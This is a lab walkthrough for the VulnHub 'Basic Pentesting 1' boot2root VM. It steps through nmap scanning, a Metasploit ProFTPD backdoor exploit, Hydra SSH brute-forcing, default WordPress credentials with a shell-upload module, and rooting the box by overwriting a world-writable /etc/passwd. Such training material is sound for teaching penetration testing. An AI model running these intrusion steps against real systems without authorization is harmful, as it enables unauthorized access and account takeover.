Vulnhub - Basic_Pentesting1
Basic Pentesting1 is a boot2root virtual machine created by Josiah Pierce, designed to help newcomers develop penetration testing skills. The VM contains multiple remote vulnerabilities and privilege escalation vectors, providing a practical environment for users to explore offensive security techniques. The goal is to remotely attack the VM, gain root privileges, and read the flag located at /root/flag.txt. The VM is available for download on VulnHub.
Basic_Pentesting1
Port Scanning
1
2
3
4
5
$ nmap -A <target_ip>
Other Scanning Examples:
$ nmap -A -p- -T4 <target_ip>
$ nmap -sV -sC <target_ip>
After the nmap has done scanning, we found 3 open ports running ftp, ssh and http
Exploiting port 21 ProFTPD 1.3.3c
1
2
3
4
5
6
$ msfconsole
$ search ProFTPD
$ use exploit/unix/ftp/proftpd_133c_backdoor
$ set rhosts <target_ip>
$ set rport 21
$ run/exploit
User enumeration
We had found that the users are marlinspike and root from previous ftp exploit.
Bruteforcing into port 22 (SSH) using hydra trying default credentials
1
2
3
4
$ hydra -l marlinspike -P <wordlist> ssh://target_ip -V
Password Found for user(marlinspike):
[22][ssh] host: 192.168.1.70 login: marlinspike password: marlinspike
Privilege Escalation
We can use the following find command for finding binaries that we might be able to abuse.
find / -type f -perm -u=s 2>/dev/null
After researching, we find that the user(marlinspike) can use all the commands.
Now, let’s try abusing binary sudo su and enter password of the user marlinspike/marlinspike and boy we are in :V
Directory Enumeration for port 80 (http-server)
gobuster dir -u
-w
We found /secret directory. Let’s check in the browser.
We can see a wordpress blog running on the the server.
We can see that the webpage is not properly loading.
So let’s add the vtcsec into our /etc/hosts file and check how the webpage looks afterward.
Now, let’s go to wp-admin as it is the admin panel for wordpress sites and try default login credentials i.e admin/admin we’re in. If the default credentials wouldn’t have worked we probably would have needed to bruteforce into the admin panel via burpsuite intruder or hydra or by using any bruteforcing tool you prefer.
Now, let’s try to gain access with wordpress exploit via metasploit.
1
2
3
4
5
$ msfconsole
$ search wp_admin
$ use exploit/unix/webapp/wp_admin_shell_upload
set every options that is needed for the exploit.
We can see that we got ourselves a meterpreter session.
Privilege Escalation
To check for any potential misconfigurations that could lead to privilege escalation, a good script to use is the unix-privesc-check script from pentestmonkey
This can be uploaded from the meterpreter session by running the following command:
upload /usr/bin/unix-privesc-check /tmp/unix-privesc-check
I prefer working inside /tmp directory.
After we upload the file to the server we then can execute the file:
1
2
3
$ shell
$ cd /tmp
$ chmod +x unix-privesc-check
The author of unix-privesc-check recommends to grep the output for WARNING, which will show any potential misconfigurations. This can be run as one single command:
1
./unix-privesc-check standard | grep WARNING
We can see WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd after executing the unix-privesc-check.
This means that we can write into the /etc/passwd file. So, let’s download the file into our host machine by getting back into our meterpreter shell and executing:
download /etc/passwd
Now, from a local terminal, we can use openssl to generate a new hashed password:
openssl passwd -1 lol
We get our hashed password i.e $1$X5FkPmLQ$h0yILWHDiUeWUeezpmWU20
Now, open the passwd file we downloaded before and replace x after root like:
Now, all we need to do is upload the modified passwd file from our host to target server using:
upload
/etc/passwd
To make the shell interactive:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Finally, we can switch to root’s account.
1
2
$ su root
Password: lol
